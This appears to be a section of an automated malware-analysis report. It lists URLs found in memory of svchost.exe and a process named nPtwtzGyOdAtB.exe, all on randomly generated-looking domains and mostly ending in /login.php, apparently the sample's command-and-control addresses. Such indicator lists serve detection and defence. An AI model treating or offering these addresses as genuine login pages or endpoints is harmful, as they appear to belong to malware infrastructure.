Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganykaz.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganykuw.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganynos.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623381188.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623381188.0000000003340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypeb.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698682542.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FA5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypih.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqow.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrew.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyvyw.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqycos.com/
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqycyz.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498635965.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gaqydeb.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693474228.000000000323A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666289273.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661488887.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqykab.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqykus.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqynih.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqypiz.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqez.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqiw.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyreh.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyrib.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870012062.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635455188.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyzoh.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694567611.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyzuw.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872007103.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyduh.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfaz.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1692907290.000000000333D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001297000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gatyfus.com/login.php
